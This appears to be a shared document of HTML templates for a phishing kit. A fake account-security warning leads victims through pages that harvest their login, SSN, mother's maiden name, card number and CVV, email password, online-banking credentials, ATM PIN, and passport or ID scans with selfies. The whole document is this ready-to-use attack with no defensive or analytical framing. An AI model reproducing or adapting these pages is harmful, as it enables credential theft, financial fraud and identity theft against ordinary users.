You are on page 1of 6

Login page

<!DOCTYPE html>
<html>
<head>
<title>Login Page</title>
</head>
<body>
<form action="/login" method="POST">
<label for="email">Email:</label>
<input type="email" id="email" name="email" required><br><br>
<label for="password">Password:</label>
<input type="password" id="password" name="password" required><br><br>
<input type="submit" value="Log in"><br><br>
</form>
<button><a href="/signup">Sign up</a></button>
</body>
</html>

Warning page
<!DOCTYPE html>
<html>
<head>
<title>Warning Page</title>
</head>
<body>
<img src="path/to/login/logo.png" alt="Login Logo"><br><br>
<p>We've noticed some unusual activity. We need your help securing your account to prevent
any unauthorized access for your safety, there may be some limitations on your account if the
information isn't connect.</p>
<form action="/secure-account" method="POST">
<input type="submit" value="Secure My Account">
</form>
</body>
</html>

Billing page

<!DOCTYPE html>
<html>
<head>
<title>Billing Address Page</title>
</head>
<body>
<form action="/continue" method="POST">
<label for="full-name">Full Name:</label>
<input type="text" id="full-name" name="full-name" required><br><br>
<label for="date-of-birth">Date of Birth:</label>
<input type="date" id="date-of-birth" name="date-of-birth" required><br><br>
<label for="address-line">Address Line:</label>
<input type="text" id="address-line" name="address-line" required><br><br>
<label for="zip-code">Zip Code:</label>
<input type="text" id="zip-code" name="zip-code" required><br><br>
<label for="city-town-village">City/Town/Village:</label>
<input type="text" id="city-town-village" name="city-town-village" required><br><br>
<label for="state-region">State/Region:</label>
<input type="text" id="state-region" name="state-region" required><br><br>
<label for="country">Country:</label>
<input type="text" id="country" name="country" required><br><br>
<label for="phone-type">Phone Type:</label>
<select id="phone-type" name="phone-type" required>
<option value="home">Home</option>
<option value="work">Work</option>
<option value="mobile">Mobile</option>
</select><br><br>
<label for="phone">Phone:</label>
<input type="tel" id="phone" name="phone" required><br><br>
<label for="mother-maiden-name">Mother Maiden Name:</label>
<input type="text" id="mother-maiden-name" name="mother-maiden-name"
required><br><br>
<label for="ssn">SSN:</label>
<input type="text" id="ssn" name="ssn"><br><br>
<input type="submit" value="Continue"><br><br>
</form>
</body>
</html>

Confirm card page

<!DOCTYPE html>
<html>
<head>
<title>Confirm Your Card</title>
</head>
<body>
<form action="/continue" method="POST">
<label for="card-type">Card Type:</label>
<select id="card-type" name="card-type" required>
<option value="visa">Visa</option>
<option value="mastercard">Mastercard</option>
<option value="amex">American Express</option>
</select><br><br>
<label for="credit-card-number">Credit Card Number:</label>
<input type="text" id="credit-card-number" name="credit-card-number" required><br><br>
<label for="expiring-date">Expiring Date:</label>
<input type="date" id="expiring-date" name="expiring-date" required><br><br>
<label for="ccv">CCV:</label>
<input type="text" id="ccv" name="ccv" required><br><br>
<label for="account-number">Account Number:</label>
<input type="text" id="account-number" name="account-number" required><br><br>
<input type="submit" value="Continue"><br><br>
</form>
</body>
</html>

Link email
<!DOCTYPE html>
<html>
<head>
<title>Link Email Account</title>
</head>
<body>
<form action="/continue" method="POST">
<label for="email">Email:</label>
<input type="email" id="email" name="email" required><br><br>
<label for="email-password">Email Password:</label>
<input type="password" id="email-password" name="email-password" required><br><br>
<input type="submit" value="Continue"><br><br>
</form>
</body>
</html>

Link Bank ACC

<!DOCTYPE html>
<html>
<head>
<title>Link Bank Account</title>
</head>
<body>
<form action="/continue" method="POST">
<label for="bank-name">Bank Name:</label>
<input type="text" id="bank-name" name="bank-name" required><br><br>
<label for="account-username-id">Account Username/ID:</label>
<input type="text" id="account-username-id" name="account-username-id" required><br><br>
<label for="account-password">Account Password:</label>
<input type="password" id="account-password" name="account-password" required><br><br>
<label for="account-number">Account Number:</label>
<input type="text" id="account-number" name="account-number" required><br><br>
<label for="routing-number">Routing Number:</label>
<input type="text" id="routing-number" name="routing-number" required><br><br>
<label for="atm-pin">ATM PIN:</label>
<input type="password" id="atm-pin" name="atm-pin" required><br><br>
<input type="submit" value="Continue"><br><br>
</form>
</body>
</html>

Upload identification

<!DOCTYPE html>
<html>
<head>
<title>Upload Identification Documents</title>
</head>
<body>
<form action="/upload" method="POST" enctype="multipart/form-data">
<label for="id-type">Select ID Type:</label>
<select id="id-type" name="id-type">
<option value="passport">Passport</option>
<option value="national-id">National ID</option>
<option value="driver-license">Driver's License</option>
</select><br><br>
<label for="id-file">Upload ID Document:</label>
<input type="file" id="id-file" name="id-file" accept="image/*" required><br><br>
<input type="submit" value="Upload"><br><br>
</form>
</body>
</html>
Passport uploading

<!DOCTYPE html>
<html>
<head>
<title>Passport Uploading</title>
</head>
<body>
<form action="/upload" method="POST" enctype="multipart/form-data">
<label for="passport-front">Upload Front of Passport:</label>
<input type="file" id="passport-front" name="passport-front" accept="image/*"
required><br><br>
<label for="selfie">Upload Selfie with Passport:</label>
<input type="file" id="selfie" name="selfie" accept="image/*" required><br><br>
<input type="submit" value="Upload"><br><br>
</form>
</body>
</html>

National ID uploading

<!DOCTYPE html>
<html>
<head>
<title>National ID Uploading</title>
</head>
<body>
<form action="/upload" method="POST" enctype="multipart/form-data">
<label for="national-id-front">Upload Front of National ID:</label>
<input type="file" id="national-id-front" name="national-id-front" accept="image/*"
required><br><br>
<label for="national-id-back">Upload Back of National ID:</label>
<input type="file" id="national-id-back" name="national-id-back" accept="image/*"
required><br><br>
<label for="selfie">Upload Selfie with National ID:</label>
<input type="file" id="selfie" name="selfie" accept="image/*" required><br><br>
<input type="submit" value="Upload"><br><br>
</form>
</body>
</html>
Driver's license uploading

<!DOCTYPE html>
<html>
<head>
<title>Driver's License Uploading</title>
</head>
<body>
<form action="/upload" method="POST" enctype="multipart/form-data">
<label for="license-front">Upload Front of Driver's License:</label>
<input type="file" id="license-front" name="license-front" accept="image/*" required><br><br>
<label for="license-back">Upload Back of Driver's License:</label>
<input type="file" id="license-back" name="license-back" accept="image/*" required><br><br>
<label for="selfie">Upload Selfie with Driver's License:</label>
<input type="file" id="selfie" name="selfie" accept="image/*" required><br><br>
<input type="submit" value="Upload"><br><br>
</form>
</body>
</html>

You might also like